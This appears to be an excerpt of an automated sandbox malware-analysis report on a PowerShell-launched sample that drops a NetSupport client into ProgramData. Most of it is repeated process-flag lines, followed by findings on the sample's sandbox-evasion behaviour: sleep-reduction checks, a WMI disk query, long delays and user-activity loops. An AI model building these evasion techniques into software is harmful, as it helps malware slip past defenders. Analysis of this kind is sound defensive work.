Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\netsupport\client\client32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\netsupport\client\client32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\netsupport\client\client32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\netsupport\client\client32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\netsupport\client\client32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\netsupport\client\client32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\netsupport\client\client32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\netsupport\client\client32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\netsupport\client\client32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\netsupport\client\client32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Contains functionality to detect sleep reduction / modifications

Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_6BEB91F0		32_2_6BEB91F0
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_6BEC4F30		32_2_6BEC4F30

Delayed program exit found

Source: C:\ProgramData\netsupport\client\client32.exe

Code function: 32_2_110B7290 Sleep,ExitProcess,

32_2_110B7290

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 900000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899888	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899776	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899664	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899552	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899440	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899312	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899200	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7678	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2187	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1859	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7949	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1654	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8173	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1945
